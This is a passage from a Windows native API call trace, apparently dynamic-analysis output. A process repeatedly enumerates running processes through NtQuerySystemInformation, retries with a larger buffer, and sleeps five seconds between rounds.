RegionSize=0xdea68*=0x10000) returned 0x0 [0262.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.135] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.145] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.156] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.166] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.176] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.185] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.195] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.205] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.214] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.222] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.233] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.243] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.255] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.265] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.279] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.290] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.298] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.307] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.318] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 